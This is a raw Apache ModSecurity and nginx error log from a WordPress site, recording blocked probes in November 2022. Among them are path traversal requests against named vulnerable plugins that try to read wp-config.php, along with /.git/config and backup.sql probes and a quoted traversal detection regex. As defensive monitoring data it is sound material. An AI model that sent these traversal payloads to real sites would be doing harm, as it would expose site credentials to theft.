"/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y2MPlZFRq1es0AN8rlIcxwAAAJM"] [Wed Nov 02 22:15:33.872336 2022] [:error] [pid 26922:tid 140434827376384] [client 5.188.62.140:48920] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y2MyVZFRq1es0AN8rlIdxQAAAIM"] [Thu Nov 03 06:06:31.202438 2022] [autoindex:error] [pid 27257:tid 140306305509120] [client 3.142.210.193:41708] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Nov 03 07:01:28.432482 2022] [:error] [pid 27968:tid 140306204796672] [client 5.188.62.21:43090] [client 5.188.62.21] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y2OtmCdauflcdkCvA-AuxgAAANE"] [Thu Nov 03 08:16:48.395818 2022] [:error] [pid 27968:tid 140306171225856] [client 51.89.207.252:45374] [client 51.89.207.252] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/backup.sql"] [unique_id "Y2O_QCdauflcdkCvA-AvnAAAANU"] [Fri Nov 04 05:08:15.765414 2022] [:error] [pid 3183:tid 140560832579328] [client 5.188.62.140:59586] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y2Tkj0a41fbfPvFRYdjjmAAAANg"] [Fri Nov 04 21:16:19.965682 2022] [:error] [pid 19543:tid 140560966862592] [client 94.130.151.197:34148] [client 94.130.151.197] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php"] [unique_id "Y2XHc14HS2tTy7i3fjyxkQAAAEg"], referer: https://www.google.com [Fri Nov 04 21:16:22.054393 2022] [:error] [pid 19544:tid 140560933291776] [client 94.130.151.197:34150] [client 94.130.151.197] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-admin/admin-ajax.php?action=handle_downloads&alg_wc_pif_download_file=../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "Y2XHdqbo9_g2HgUD1buHEQAAAIw"], referer: https://www.google.com [Fri Nov 04 21:16:23.930726 2022] [:error] [pid 19692:tid 140561090660096] [client 94.130.151.197:34152] [client 94.130.151.197] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php"] [unique_id "Y2XHd8kLkdfX4VmEXi0pqAAAAMI"], referer: https://www.google.com [Fri Nov 04 21:16:25.307271 2022] [:error] [pid 19542:tid 140560950077184] [client 94.130.151.197:34154] [client 94.130.151.197] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=../../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php"] [unique_id "Y2XHeerolb1zMPe_hfK1HwAAAAo"], referer: https://www.google.com [Fri Nov 04 21:16:26.826796 2022] [:error] [pid 19542:tid 140560874542848] [client 94.130.151.197:34156] [client 94.130.151.197] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/post-pdf-export/dompdf/dompdf.php"] [unique_id "Y2XHeurolb1zMPe_hfK1IAAAABM"], referer: https://www.google.com [Sat Nov 05 13:03:03.148184 2022] [:error] [pid 15714:tid 139657522157312] [client 188.34.178.255:51686] [client 188.34.178.255] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php"] [unique_id "Y2alV6PULFkHEVWeXlPFjQAAAIk"], referer: https://www.google.com [Sat Nov 05 13:03:04.373330 2022] [:error] [pid 16327:tid 139657480193792] [client 188.34.178.255:51692] [client 188.34.178.255] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-admin/admin-ajax.php?action=handle_downloads&alg_wc_pif_download_file=../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "Y2alWJCzcdAP0GVyMdSb5AAAAM4"], referer: https://www.google.com [Sat Nov 05 13:03:05.697106 2022] [:error] [pid 16327:tid 139657488586496] [client 188.34.178.255:51694] [client 188.34.178.255] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php"] [unique_id "Y2alWZCzcdAP0GVyMdSb5QAAAM0"], referer: https://www.google.com [Sat Nov 05 13:03:07.104271 2022] [:error] [pid 16327:tid 139657648817920] [client 188.34.178.255:51698] [client 188.34.178.255] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=../../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php"] [unique_id "Y2alW5CzcdAP0GVyMdSb5wAAAMI"], referer: https://www.google.com [Sat Nov 05 13:03:08.387706 2022] [:error] [pid 15713:tid 139657421444864] [client 188.34.178.255:51702] [client 188.34.178.255] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/post-pdf-export/dompdf/dompdf.php"] [unique_id "Y2alXExuCSlBC3Ufi1Jf8wAAAFU"], referer: https://www.google.com 2022/11/06 01:01:00 [error] 26122#26122: *263933 access forbidden by rule, client: 18.197.71.245, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/11/06 01:01:00 [error] 26123#26123: *263934 access forbidden by rule, client: 18.197.71.245, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/11/06 01:01:00 [error] 26122#26122: *263935 access forbidden by rule, client: 18.197.71.245, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/11/06 01:01:00 [error] 26123#26123: *263936 access forbidden by rule, client: 18.197.71.245, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/11/06 01:01:01 [error] 26122#26122: *263937 access forbidden by rule, client: 18.197.71.245, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/11/06 01:01:01 [error] 26122#26122: *263938 access forbidden by rule, client: 18.197.71.245, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/11/06 01:01:01 [error] 26122#26122: *263939 access forbidden by rule, client: 18.197.71.245, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/11/06 01:01:02 [error] 26123#26123: *263940 access forbidden by rule, client: 18.197.71.245, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sun Nov 06 02:22:42.036080 2022] [autoindex:error] [pid 26162:tid 139657665603328] [client 40.76.99.196:33386] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2022/11/07 00:43:07 [error] 9743#9743: *287237 access forbidden by rule, client: 170.187.164.177, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2022/11/07 00:43:07 [error] 9744#9744: *287287 access forbidden by rule, client: 165.227.232.121, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2022/11/07 00:43:08 [error] 9743#9743: *287323 access forbidden by rule, client: 185.3.94.68, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2022/11/07 00:43:08 [error] 9743#9743: *287368 access forbidden by rule, client: 164.92.143.142, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2022/11/07 00:43:09 [error] 9744#9744: *287443 access forbidden by rule, client: 185.3.94.247, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2022/11/07 00:43:09 [error] 9744#9744: *287453 access forbidden by rule, client: 185.3.94.68, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Mon Nov 07 03:45:27.852279 2022] [ssl:warn] [pid 11601:tid 140136099923840] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 07 03:45:27.992279 2022] [ssl:warn] [pid 11602:tid 140136099923840] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 07 03:45:28.375754 2022] [ssl:warn] [pid 11602:tid 140136099923840] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 07 03:45:30.192092 2022] [ssl:warn] [pid 11602:tid 140136099923840] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 07 03:45:32.489893 2022] [ssl:warn] [pid 12020:tid 140259810510720] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 07 03:45:32.602062 2022] [ssl:warn] [pid 12021:tid 140259810510720] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 08 03:11:23.854963 2022] [ssl:warn] [pid 20003:tid 140287744358272] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 08 03:11:23.981697 2022] [ssl:warn] [pid 20004:tid 140287744358272] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 08 03:11:24.326121 2022] [ssl:warn] [pid 20004:tid 140287744358272] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 08 03:11:25.943394 2022] [ssl:warn] [pid 20004:tid 140287744358272] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 08 03:11:28.223576 2022] [ssl:warn] [pid 20424:tid 139882537965440] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 08 03:11:28.351822 2022] [ssl:warn] [pid 20425:tid 139882537965440] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 08 10:46:07.223023 2022] [ssl:warn] [pid 14008:tid 140435705431936] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 08 10:46:07.380371 2022] [ssl:warn] [pid 14010:tid 140435705431936] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 08 12:04:44.953697 2022] [autoindex:error] [pid 14013:tid 140435288680192] [client 172.173.184.58:46118] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 08 22:12:36.339049 2022] [:error] [pid 14013:tid 140435524810496] [client 5.188.62.174:47718] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y2sapI5FQmUfNceqho95twAAAIA"] [Wed Nov 09 03:34:27.993315 2022] [ssl:warn] [pid 30398:tid 140601811629952] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 09 03:34:28.156495 2022] [ssl:warn] [pid 30399:tid 140601811629952] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 09 03:34:28.660550 2022] [ssl:warn] [pid 30399:tid 140601811629952] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 09 03:34:30.347294 2022] [ssl:warn] [pid 30399:tid 140601811629952] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 09 03:34:32.574046 2022] [ssl:warn] [pid 30817:tid 139841016641408] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 09 03:34:32.695060 2022] [ssl:warn] [pid 30818:tid 139841016641408] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 09 21:15:05.344254 2022] [autoindex:error] [pid 30837:tid 139840836019968] [client 92.205.56.212:35250] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Nov 10 03:40:29.908252 2022] [ssl:warn] [pid 24135:tid 140634258978688] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 10 03:40:30.035653 2022] [ssl:warn] [pid 24136:tid 140634258978688] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 10 03:40:32.783012 2022] [ssl:warn] [pid 24136:tid 140634258978688] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 10 03:40:34.228174 2022] [ssl:warn] [pid 24136:tid 140634258978688] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 10 03:40:36.533533 2022] [ssl:warn] [pid 24556:tid 139773365335936] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 10 03:40:36.650021 2022] [ssl:warn] [pid 24557:tid 139773365335936] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 10 13:46:00.301993 2022] [:error] [pid 25199:tid 139773024904960] [client 5.188.62.140:42688] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y21G6FSJK8o-nK9fqCfWfQAAAMs"] [Fri Nov 11 03:43:38.052130 2022] [ssl:warn] [pid 6667:tid 140172595718016] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 11 03:43:38.178700 2022] [ssl:warn] [pid 6668:tid 140172595718016] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 11 03:43:38.541106 2022] [ssl:warn] [pid 6668:tid 140172595718016] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 11 03:43:40.075692 2022] [ssl:warn] [pid 6668:tid 140172595718016] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 11 03:43:42.303239 2022] [ssl:warn] [pid 7086:tid 140394390325120] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 11 03:43:42.413926 2022] [ssl:warn] [pid 7087:tid 140394390325120] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 